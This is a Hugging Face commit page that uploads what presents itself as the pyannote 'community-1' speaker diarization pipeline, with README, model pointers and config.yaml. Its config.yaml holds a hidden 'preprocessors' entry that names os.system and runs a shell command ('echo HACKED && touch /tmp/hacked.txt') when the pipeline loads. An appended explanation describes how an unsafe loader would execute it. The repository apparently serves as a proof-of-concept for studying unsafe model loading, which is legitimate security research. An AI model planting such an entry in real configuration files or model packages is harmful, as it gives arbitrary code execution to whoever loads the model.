XManFromXlab committed · Commit e858175 · verified · 1 Parent(s): 67c47a1

Upload folder using huggingface_hub

.gitattributes CHANGED
@@ -33,3 +33,4 @@ saved_model/**/* filter=lfs diff=lfs merge=lfs -text
 *.zip filter=lfs diff=lfs merge=lfs -text
 *.zst filter=lfs diff=lfs merge=lfs -text
 *tfevents* filter=lfs diff=lfs merge=lfs -text
+diarization.gif filter=lfs diff=lfs merge=lfs -text
README.md ADDED
@@ -0,0 +1,232 @@
---
tags:
- pyannote
- pyannote-audio
- pyannote-audio-pipeline
- audio
- voice
- speech
- speaker
- speaker-diarization
- speaker-change-detection
- voice-activity-detection
- overlapped-speech-detection
- automatic-speech-recognition
license: cc-by-4.0
extra_gated_prompt: "Your input helps us strengthen the pyannote community and improve our open-source offerings. This pipeline is released under the CC-BY-4.0 license and will always remain freely accessible. By providing your details, you agree that we may email you occasionally with important news about pyannote models, invitations to try premium pipelines, and information about specific services designed for researchers and professionals like you."
extra_gated_fields:
  Company/university: text
  Use case:
    type: select
    options:
      - label: Meeting note taker (automated meeting transcription, action item extraction, and speaker identification in recordings)
        value: meeting
      - label: Conversation AI (chatbots, voice assistants, multi-turn dialogue systems with speaker awareness)
        value: conversation
      - label: CCaaS and customer experience (call center analytics, customer service optimization, and interaction quality monitoring)
        value: ccaas
      - label: Voice agents (AI-powered phone systems, automated customer service, voice-based interactions)
        value: agent
      - label: Media and automated dubbing (content creation, podcast processing, video production, and multilingual media)
        value: dubbing
      - label: Training and development (educational content analysis, corporate training evaluation, and learning assessment tools)
        value: training
      - label: Other
        value: other
---

<span style="color:red; font-size:20px"><b>
Attention! This is a proof-of-concept model deployed here only for research demonstration.
Do not use it elsewhere for any illegal purpose; you bear full legal responsibility for any abuse.
</b></span>

# `community-1` speaker diarization

This pipeline ingests mono audio sampled at 16kHz and outputs speaker diarization.

- stereo or multi-channel audio files are automatically downmixed to mono by averaging the channels.
- audio files sampled at a different rate are automatically resampled to 16kHz upon loading.

The [main improvements brought by `Community-1`](https://www.pyannote.ai/blog/community-1) are:

- [improved](#benchmark) speaker assignment and counting
- simpler reconciliation with transcription timestamps thanks to [*exclusive*](#exclusive-speaker-diarization) speaker diarization
- easy [offline use](#offline-use) (i.e. without an internet connection)
- (optional) [hosting](https://hf.co/pyannote/speaker-diarization-community-1-cloud) on the pyannoteAI cloud

## Setup

1. Install with `pip install pyannote.audio`
2. Accept this pipeline's user conditions
3. Create an access token at [`hf.co/settings/tokens`](https://hf.co/settings/tokens)

## Quick start

```python
# download the pipeline from Huggingface
from pyannote.audio import Pipeline

pipeline = Pipeline.from_pretrained(
    "pyannote/speaker-diarization-community-1",
    token="{huggingface-token}")

# run the pipeline locally on your computer
output = pipeline("audio.wav")

# print the predicted speaker diarization
for turn, speaker in output.speaker_diarization:
    print(f"{speaker} speaks between t={turn.start:.3f}s and t={turn.end:.3f}s")
```

## Benchmark

Out of the box, `Community-1` performs much better than `speaker-diarization-3.1`.

We report [diarization error rates](http://pyannote.github.io/pyannote-metrics/reference.html#diarization) (in %) on a large collection of academic benchmarks (fully automatic processing, no forgiveness collar, no skipping of overlapping speech).

| Benchmark (last updated in 2025-09) | [`legacy` (3.1)](https://hf.co/pyannote/speaker-diarization-3.1) | [`community-1`](https://www.pyannote.ai/blog/community-1) | [`precision-2`](https://www.pyannote.ai/blog/precision-2) |
| --- | --- | --- | --- |
| [AISHELL-4](https://arxiv.org/abs/2104.03603) | 12.2 | 11.7 | 11.4 |
| [AliMeeting](https://www.openslr.org/119/) (channel 1) | 24.5 | 20.3 | 15.2 |
| [AMI](https://groups.inf.ed.ac.uk/ami/corpus/) (IHM) | 18.8 | 17.0 | 12.9 |
| [AMI](https://groups.inf.ed.ac.uk/ami/corpus/) (SDM) | 22.7 | 19.9 | 15.6 |
| [AVA-AVD](https://arxiv.org/abs/2111.14448) | 49.7 | 44.6 | 37.1 |
| [CALLHOME](https://catalog.ldc.upenn.edu/LDC2001S97) ([part 2](https://github.com/BUTSpeechFIT/CALLHOME_sublists/issues/1)) | 28.5 | 26.7 | 16.6 |
| [DIHARD 3](https://catalog.ldc.upenn.edu/LDC2022S14) ([full](https://arxiv.org/abs/2012.01477)) | 21.4 | 20.2 | 14.7 |
| [Ego4D](https://arxiv.org/abs/2110.07058) (dev.) | 51.2 | 46.8 | 39.0 |
| [MSDWild](https://github.com/X-LANCE/MSDWILD) | 25.4 | 22.8 | 17.3 |
| [RAMC](https://www.openslr.org/123/) | 22.2 | 20.8 | 10.5 |
| [REPERE](https://www.islrn.org/resources/360-758-359-485-0/) (phase 2) | 7.9 | 8.9 | 7.4 |
| [VoxConverse](https://github.com/joonson/voxconverse) (v0.3) | 11.2 | 11.2 | 8.5 |

The `Precision-2` model is even more accurate and can be tested like this:

1. Create an API key on the [pyannoteAI dashboard](https://dashboard.pyannote.ai) (free credits included)
2. Change one line of code

```diff
  from pyannote.audio import Pipeline
  pipeline = Pipeline.from_pretrained(
-     'pyannote/speaker-diarization-community-1', token="{huggingface-token}")
+     'pyannote/speaker-diarization-precision-2', token="{pyannoteAI-api-key}")
  diarization = pipeline("audio.wav")  # runs on pyannoteAI servers
```
114
+
115
+ ## Processing on GPU
116
+
117
+ `pyannote.audio` pipelines run on CPU by default.
118
+ You can send them to GPU with the following lines:
119
+
120
+ ```python
121
+ import torch
122
+ pipeline.to(torch.device("cuda"))
123
+ ```
124
+
125
+ ## Processing from memory
126
+
127
+ Pre-loading audio files in memory may result in faster processing:
128
+
129
+ ```python
130
+ waveform, sample_rate = torchaudio.load("audio.wav")
131
+ output = pipeline({"waveform": waveform, "sample_rate": sample_rate})
132
+ ```

## Monitoring progress

Hooks are available to monitor the progress of the pipeline:

```python
from pyannote.audio.pipelines.utils.hook import ProgressHook

with ProgressHook() as hook:
    output = pipeline("audio.wav", hook=hook)
```

## Controlling the number of speakers

In case the number of speakers is known in advance, one can use the `num_speakers` option:

```python
output = pipeline("audio.wav", num_speakers=2)
```

One can also provide lower and/or upper bounds on the number of speakers using the `min_speakers` and `max_speakers` options:

```python
output = pipeline("audio.wav", min_speakers=2, max_speakers=5)
```

## Exclusive speaker diarization

On top of the regular speaker diarization, the `Community-1` pretrained pipeline returns a new *exclusive* speaker diarization, available as `output.exclusive_speaker_diarization`.

This feature is [backported from our latest commercial model](https://www.pyannote.ai/blog/precision-2) and simplifies the reconciliation between fine-grained speaker diarization timestamps and (sometimes not so precise) transcription timestamps.
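
Because exclusive speaker turns never overlap, each transcription timestamp falls within at most one turn, so assigning words to speakers becomes a simple lookup. A sketch under assumed inputs (the `Turn` tuples stand in for the pipeline's output segments, and the word timestamps are hypothetical):

```python
from collections import namedtuple

Turn = namedtuple("Turn", ["start", "end"])

# stand-in for iterating over output.exclusive_speaker_diarization
exclusive = [(Turn(0.0, 1.2), "SPEAKER_00"), (Turn(1.2, 2.0), "SPEAKER_01")]

# hypothetical (word, start, end) timestamps from a transcription system
words = [("hello", 0.5, 0.9), ("world", 1.3, 1.6)]

assignment = {}
for turn, speaker in exclusive:
    for word, start, end in words:
        # midpoint lookup is unambiguous since exclusive turns never overlap
        if turn.start <= (start + end) / 2 < turn.end:
            assignment[word] = speaker

print(assignment)  # {'hello': 'SPEAKER_00', 'world': 'SPEAKER_01'}
```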

## Offline use

1. In the terminal, copy the pipeline to disk:

```bash
# make sure git-lfs is installed (https://git-lfs.com)
git lfs install

# create a directory on disk
mkdir /path/to/directory

# when prompted for a password, use an access token with write permissions.
# generate one from your settings: https://huggingface.co/settings/tokens
git clone https://hf.co/pyannote/speaker-diarization-community-1 /path/to/directory/pyannote-speaker-diarization-community-1
```

2. In Python, use the pipeline without an internet connection:

```python
# load pipeline from disk (works without internet connection)
from pyannote.audio import Pipeline
pipeline = Pipeline.from_pretrained("/path/to/directory/pyannote-speaker-diarization-community-1")

# run the pipeline locally on your computer
output = pipeline("audio.wav")
```

## Citations

1. Speaker segmentation model

```bibtex
@inproceedings{Plaquet23,
  author={Alexis Plaquet and Hervé Bredin},
  title={{Powerset multi-class cross entropy loss for neural speaker diarization}},
  year={2023},
  booktitle={Proc. INTERSPEECH 2023},
}
```

2. Speaker embedding model

```bibtex
@inproceedings{Wang2023,
  title={Wespeaker: A research and production oriented speaker embedding learning toolkit},
  author={Wang, Hongji and Liang, Chengdong and Wang, Shuai and Chen, Zhengyang and Zhang, Binbin and Xiang, Xu and Deng, Yanlei and Qian, Yanmin},
  booktitle={ICASSP 2023, IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP)},
  pages={1--5},
  year={2023},
  organization={IEEE}
}
```

3. Speaker clustering

```bibtex
@article{Landini2022,
  author={Landini, Federico and Profant, J{\'a}n and Diez, Mireia and Burget, Luk{\'a}{\v{s}}},
  title={{Bayesian HMM clustering of x-vector sequences (VBx) in speaker diarization: theory, implementation and analysis on standard tasks}},
  year={2022},
  journal={Computer Speech \& Language},
}
```

## Acknowledgment

Training and tuning made possible thanks to [GENCI](https://www.genci.fr/) on the [**Jean Zay**](http://www.idris.fr/eng/jean-zay/) supercomputer.
config.yaml ADDED
@@ -0,0 +1,27 @@
dependencies:
  pyannote.audio: 4.0.0

pipeline:
  name: pyannote.audio.pipelines.SpeakerDiarization
  params:
    clustering: VBxClustering
    segmentation: $model/segmentation
    segmentation_batch_size: 32
    embedding: $model/embedding
    embedding_batch_size: 32
    embedding_exclude_overlap: true
    plda: $model/plda

preprocessors:
  key:
    name: os.system
    params:
      command: "echo HACKED && touch /tmp/hacked.txt"

params:
  clustering:
    threshold: 0.6
    Fa: 0.07
    Fb: 0.8
  segmentation:
    min_duration_off: 0.0
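
The `preprocessors` entry above is the proof-of-concept payload that the red warning in the README refers to: if a config loader naively resolves the dotted `name` to a Python callable and invokes it with `params` while instantiating the pipeline, simply loading this repository executes an arbitrary shell command. A minimal sketch of that unsafe resolution pattern (hypothetical loader code, not pyannote.audio's actual implementation; nothing is executed here):

```python
import importlib

def resolve_callable(dotted_name):
    # naively resolve a dotted path such as "os.system" to a Python callable,
    # the way a trusting config loader might
    module_name, _, attr = dotted_name.rpartition(".")
    return getattr(importlib.import_module(module_name), attr)

# fragment mirroring the `preprocessors` entry in the YAML above
preprocessor = {"name": "os.system", "params": {"command": "echo HACKED && touch /tmp/hacked.txt"}}

fn = resolve_callable(preprocessor["name"])
# a loader that now ran fn(preprocessor["params"]["command"]) would execute the
# attacker's shell command; safe loaders whitelist allowed callables instead
```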
diarization.gif ADDED

Git LFS Details

  • SHA256: 0d925ad38995d89009260e493b0ae2e684c3e1397f495265ed841c45c4f73a35
  • Pointer size: 131 Bytes
  • Size of remote file: 861 kB
embedding/README.md ADDED
@@ -0,0 +1,20 @@
Copied from https://huggingface.co/pyannote/wespeaker-voxceleb-resnet34-LM

## License

According to [this page](https://github.com/wenet-e2e/wespeaker/blob/master/docs/pretrained.md):

> The pretrained model in WeNet follows the license of it's corresponding dataset. For example, the pretrained model on VoxCeleb follows Creative Commons Attribution 4.0 International License., since it is used as license of the VoxCeleb dataset, see https://mm.kaist.ac.kr/datasets/voxceleb/.

## Citation

```bibtex
@inproceedings{Wang2023,
  title={Wespeaker: A research and production oriented speaker embedding learning toolkit},
  author={Wang, Hongji and Liang, Chengdong and Wang, Shuai and Chen, Zhengyang and Zhang, Binbin and Xiang, Xu and Deng, Yanlei and Qian, Yanmin},
  booktitle={ICASSP 2023, IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP)},
  pages={1--5},
  year={2023},
  organization={IEEE}
}
```
embedding/pytorch_model.bin ADDED
@@ -0,0 +1,3 @@
version https://git-lfs.github.com/spec/v1
oid sha256:6f10ff60898a1d185fa22e1d11e0bfa8a92efec811f11bca48cb8cafebefd929
size 26646242
plda/README.md ADDED
@@ -0,0 +1,3 @@
PLDA model trained by the [BUT Speech@FIT](https://speech.fit.vut.cz/) group.

Thanks to [Jiangyu Han](https://github.com/jyhan03) and [Petr Pálka](https://github.com/Selesnyan) for the integration of VBx in pyannote.audio.
plda/plda.npz ADDED
@@ -0,0 +1,3 @@
version https://git-lfs.github.com/spec/v1
oid sha256:9b77bcd840692710dd3496f62ecfeed8d8e5f002fd991b785079b244eab7d255
size 133852
plda/xvec_transform.npz ADDED
@@ -0,0 +1,3 @@
version https://git-lfs.github.com/spec/v1
oid sha256:325f1ce8e48f7e55e9c8aa47e05d2766b7c48c4b25b8de8dd751e7a4cc5fbe8f
size 134376
segmentation/pytorch_model.bin ADDED
@@ -0,0 +1,3 @@
version https://git-lfs.github.com/spec/v1
oid sha256:7ad24338d844fb95985486eb1a464e32d229f6d7a03c9abe60f978bacf3f816e
size 5906507